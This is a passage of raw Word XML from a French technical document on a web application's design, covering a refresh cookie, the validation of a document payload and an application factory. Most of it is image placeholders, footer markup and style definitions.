                    <pic:cNvPr id="0" name="b83787c0fe8e-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2066351" cy="587531"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3899796" cy="1489450"/>
            <wp:docPr id="76" name="Picture 76"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ee3a00f3bfe2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3899796" cy="1489450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3899796" cy="1489450"/>
            <wp:docPr id="77" name="Picture 77"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ee3a00f3bfe2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3899796" cy="1489450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkStart w:id="154" w:name="c-pose-du-cookie-de-refresh"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pose du cookie de refresh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2645360" cy="1288663"/>
            <wp:docPr id="78" name="Picture 78"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="afc7fbd04354-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2645360" cy="1288663"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="155" w:name="d-validation-dun-payload-de-document"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Validation d'un payload de document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4816519" cy="2490337"/>
            <wp:docPr id="79" name="Picture 79"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="acc63c7c66d2-0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4816519" cy="2490337"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le même objet sert la création et la mise à jour, avec un seul drapeau pour différencier les deux régimes. Deux fonctions séparées auraient divergé dès la première règle ajoutée d'un seul côté.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="156" w:name="e-fabrique-dapplication"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fabrique d'application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le code de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">create_app()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— origine CORS explicite, enregistrement des cinq blueprints, normalisation de la réponse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">429</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— figure en § 6 et n'est pas répété ici.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkEnd w:id="157"/>
    <w:sectPr w:rsidR="00E93063" w:rsidSect="00B1648B">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A541" w14:textId="77777777" w:rsidR="000D108C" w:rsidRDefault="000D108C" w:rsidP="00690DDD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="776BEB96" w14:textId="77777777" w:rsidR="000D108C" w:rsidRDefault="000D108C" w:rsidP="00690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12D7" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648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9756"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2190503C" w14:textId="520E32EE" w:rsidR="00F610BC" w:rsidRDefault="00F610BC">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="55388942" w14:textId="77777777" w:rsidR="00690DDD" w:rsidRDefault="00690DD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53841"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="42F6E005" w14:textId="23BF6BBC" w:rsidR="00B1648B" w:rsidRDefault="00B1648B">
        <w:pPr>
          <w:pStyle w:val="Pieddepage"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="5B7A6760" w14:textId="77777777" w:rsidR="00F610BC" w:rsidRDefault="00F610B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67AC" w14:textId="77777777" w:rsidR="000D108C" w:rsidRDefault="000D108C" w:rsidP="00690DDD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1FCB2E17" w14:textId="77777777" w:rsidR="000D108C" w:rsidRDefault="000D108C" w:rsidP="00690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4265" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648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F9DB" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648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A9F7" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRDefault="00B1648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01EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA343B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797DD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3102BF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A5A3ECB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54E07A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1113A97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60C600FC"/>
    <w:lvl w:ilvl="0" w:tplc="2FA8B2A8">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8A42F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C248C582"/>
    <w:lvl w:ilvl="0" w:tplc="797A9DEA">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7A00E32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="040C001F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="72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0478031">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1041132882">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="212087928">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2368294">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="514926290">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1039630041">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1784306938">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:abstractNum w:abstractNumId="1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0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0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0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00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00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00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00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00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00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5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5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2000">
    <w:abstractNumId w:val="1990"/>
  </w:num>
  <w:num w:numId="2001">
    <w:abstractNumId w:val="100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100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3">
    <w:abstractNumId w:val="1991"/>
  </w:num>
  <w:num w:numId="2004">
    <w:abstractNumId w:val="100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5">
    <w:abstractNumId w:val="100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6">
    <w:abstractNumId w:val="100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07">
    <w:abstractNumId w:val="1991"/>
  </w:num>
  <w:num w:numId="2008">
    <w:abstractNumId w:val="100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9">
    <w:abstractNumId w:val="1991"/>
  </w:num>
  <w:num w:numId="2010">
    <w:abstractNumId w:val="100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11">
    <w:abstractNumId w:val="100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12">
    <w:abstractNumId w:val="100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13">
    <w:abstractNumId w:val="100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014">
    <w:abstractNumId w:val="100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15">
    <w:abstractNumId w:val="100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016">
    <w:abstractNumId w:val="100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100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18">
    <w:abstractNumId w:val="100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19">
    <w:abstractNumId w:val="100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20">
    <w:abstractNumId w:val="100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021">
    <w:abstractNumId w:val="100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100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023">
    <w:abstractNumId w:val="995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024">
    <w:abstractNumId w:val="995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25">
    <w:abstractNumId w:val="1991"/>
  </w:num>
  <w:num w:numId="2026">
    <w:abstractNumId w:val="100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100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EC"/>
    <w:rsid w:val="000A0913"/>
    <w:rsid w:val="000D108C"/>
    <w:rsid w:val="003A2DEC"/>
    <w:rsid w:val="00491D54"/>
    <w:rsid w:val="005E2803"/>
    <w:rsid w:val="00690DDD"/>
    <w:rsid w:val="008346C6"/>
    <w:rsid w:val="00942915"/>
    <w:rsid w:val="00AC7CB9"/>
    <w:rsid w:val="00B1648B"/>
    <w:rsid w:val="00BE2CA1"/>
    <w:rsid w:val="00C53908"/>
    <w:rsid w:val="00C64EA4"/>
    <w:rsid w:val="00D36B4A"/>
    <w:rsid w:val="00E64B5A"/>
    <w:rsid w:val="00E93063"/>
    <w:rsid w:val="00F02D2D"/>
    <w:rsid w:val="00F610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C7D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77A2C75E-7F08-41FF-ADFD-1B2401BB8A8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before="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre4Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre5Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre6Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre7Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre8Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre9Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="min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2DEC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre5Car">
    <w:name w:val="Titre 5 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre6Car">
    <w:name w:val="Titre 6 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre7Car">
    <w:name w:val="Titre 7 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre8Car">
    <w:name w:val="Titre 8 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre9Car">
    <w:name w:val="Titre 9 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitreCar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitreCar">
    <w:name w:val="Titre Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sous-titre">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Sous-titreCar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="003A2D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2D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2DEC"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationCar">
    <w:name w:val="Citation Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Citation"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuationintense">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
